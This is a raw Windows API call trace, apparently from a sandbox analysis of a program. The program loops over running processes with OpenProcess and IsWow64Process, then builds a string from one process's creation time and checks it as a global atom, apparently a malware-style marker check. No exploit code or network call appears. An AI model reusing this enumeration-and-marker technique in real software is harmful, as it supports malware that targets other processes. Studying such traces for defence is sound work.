	[0104.442] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.442] CloseHandle (hObject=0x694) returned 1
	[0104.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0104.442] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.442] CloseHandle (hObject=0x694) returned 1
	[0104.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0104.442] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.442] CloseHandle (hObject=0x694) returned 1
	[0104.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0104.442] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.443] CloseHandle (hObject=0x694) returned 1
	[0104.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0104.443] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.443] CloseHandle (hObject=0x694) returned 1
	[0104.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0104.443] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.443] CloseHandle (hObject=0x694) returned 1
	[0104.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0104.443] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.443] CloseHandle (hObject=0x694) returned 1
	[0104.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0104.444] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.444] CloseHandle (hObject=0x694) returned 1
	[0104.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0104.444] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.444] CloseHandle (hObject=0x694) returned 1
	[0104.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0104.444] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.444] CloseHandle (hObject=0x694) returned 1
	[0104.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0104.444] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.444] CloseHandle (hObject=0x694) returned 1
	[0104.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0104.444] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.444] CloseHandle (hObject=0x694) returned 1
	[0104.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0104.445] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.445] CloseHandle (hObject=0x694) returned 1
	[0104.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0104.445] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.445] CloseHandle (hObject=0x694) returned 1
	[0104.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0104.445] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.445] CloseHandle (hObject=0x694) returned 1
	[0104.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0104.445] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.445] CloseHandle (hObject=0x694) returned 1
	[0104.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.445] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.445] CloseHandle (hObject=0x694) returned 1
	[0104.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.446] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.446] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0104.446] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0104.446] wsprintfA (in: param_1=0x39936c8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0104.447] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.447] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0104.447] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.447] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0104.447] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0104.447] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0104.447] CloseHandle (hObject=0x694) returned 1
	[0104.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0104.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0104.447] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.448] CloseHandle (hObject=0x694) returned 1
	[0104.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0104.448] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.448] CloseHandle (hObject=0x694) returned 1
	[0104.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0104.448] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.448] CloseHandle (hObject=0x694) returned 1
	[0104.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0104.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0104.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0104.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0104.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0104.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0104.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0104.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0104.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0104.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0104.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0104.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0104.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0104.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0104.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0104.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0104.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0104.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0104.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0104.483] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.483] CloseHandle (hObject=0x694) returned 1
	[0104.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0104.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0104.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0104.484] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.484] CloseHandle (hObject=0x694) returned 1
	[0104.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0104.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0104.484] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.484] CloseHandle (hObject=0x694) returned 1
	[0104.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0104.484] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.484] CloseHandle (hObject=0x694) returned 1
	[0104.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0104.485] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.485] CloseHandle (hObject=0x694) returned 1
	[0104.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0104.485] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.485] CloseHandle (hObject=0x694) returned 1
	[0104.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0104.485] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.485] CloseHandle (hObject=0x694) returned 1
	[0104.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0104.485] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.485] CloseHandle (hObject=0x694) returned 1
	[0104.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0104.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0104.486] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.486] CloseHandle (hObject=0x694) returned 1
	[0104.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0104.486] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.486] CloseHandle (hObject=0x694) returned 1
	[0104.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0104.486] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.486] CloseHandle (hObject=0x694) returned 1
	[0104.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0104.486] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.486] CloseHandle (hObject=0x694) returned 1
	[0104.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0104.486] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.486] CloseHandle (hObject=0x694) returned 1
	[0104.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0104.487] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.487] CloseHandle (hObject=0x694) returned 1
	[0104.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0104.487] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.487] CloseHandle (hObject=0x694) returned 1
	[0104.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0104.487] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.487] CloseHandle (hObject=0x694) returned 1
	[0104.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0104.487] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.487] CloseHandle (hObject=0x694) returned 1
	[0104.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0104.487] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.487] CloseHandle (hObject=0x694) returned 1
	[0104.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0104.488] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.488] CloseHandle (hObject=0x694) returned 1
	[0104.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0104.488] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.488] CloseHandle (hObject=0x694) returned 1
	[0104.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0104.488] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.488] CloseHandle (hObject=0x694) returned 1
	[0104.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0104.488] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.488] CloseHandle (hObject=0x694) returned 1
	[0104.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0104.488] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.488] CloseHandle (hObject=0x694) returned 1
	[0104.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0104.489] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.489] CloseHandle (hObject=0x694) returned 1
	[0104.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0104.489] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.489] CloseHandle (hObject=0x694) returned 1
	[0104.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0104.489] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.489] CloseHandle (hObject=0x694) returned 1
	[0104.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0104.489] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.489] CloseHandle (hObject=0x694) returned 1
	[0104.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0104.489] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.489] CloseHandle (hObject=0x694) returned 1
	[0104.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0104.490] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.490] CloseHandle (hObject=0x694) returned 1
	[0104.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0104.490] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.490] CloseHandle (hObject=0x694) returned 1
	[0104.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.490] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.490] CloseHandle (hObject=0x694) returned 1
	[0104.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.491] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.491] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0104.491] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0104.491] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0104.492] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.492] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0104.492] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.492] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0104.492] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0104.492] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0104.492] CloseHandle (hObject=0x694) returned 1
	[0104.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0104.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0104.493] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.493] CloseHandle (hObject=0x694) returned 1
	[0104.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0104.493] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.493] CloseHandle (hObject=0x694) returned 1
	[0104.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0104.493] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.493] CloseHandle (hObject=0x694) returned 1
	[0104.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0104.525] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0104.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0104.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0104.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0104.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0104.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0104.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0104.526] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0104.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0104.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0104.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0104.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0104.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0104.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0104.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0104.527] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0104.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0104.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0104.528] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.528] CloseHandle (hObject=0x694) returned 1
	[0104.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0104.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0104.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0104.528] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.528] CloseHandle (hObject=0x694) returned 1
	[0104.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0104.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0104.529] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.529] CloseHandle (hObject=0x694) returned 1
	[0104.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0104.529] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.529] CloseHandle (hObject=0x694) returned 1
	[0104.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0104.529] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.529] CloseHandle (hObject=0x694) returned 1
	[0104.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0104.529] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.529] CloseHandle (hObject=0x694) returned 1
	[0104.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0104.529] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.529] CloseHandle (hObject=0x694) returned 1
	[0104.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0104.530] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.530] CloseHandle (hObject=0x694) returned 1
	[0104.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0104.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0104.530] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.530] CloseHandle (hObject=0x694) returned 1
	[0104.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0104.530] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.530] CloseHandle (hObject=0x694) returned 1
	[0104.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0104.530] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.530] CloseHandle (hObject=0x694) returned 1
	[0104.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0104.531] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.531] CloseHandle (hObject=0x694) returned 1
	[0104.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0104.531] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.531] CloseHandle (hObject=0x694) returned 1
	[0104.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0104.531] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.531] CloseHandle (hObject=0x694) returned 1
	[0104.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0104.531] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.531] CloseHandle (hObject=0x694) returned 1
	[0104.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0104.531] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.531] CloseHandle (hObject=0x694) returned 1
	[0104.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0104.532] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.532] CloseHandle (hObject=0x694) returned 1
	[0104.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0104.532] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.532] CloseHandle (hObject=0x694) returned 1
	[0104.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0104.532] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.532] CloseHandle (hObject=0x694) returned 1
	[0104.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0104.533] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.533] CloseHandle (hObject=0x694) returned 1
	[0104.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0104.533] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.533] CloseHandle (hObject=0x694) returned 1
	[0104.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0104.533] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
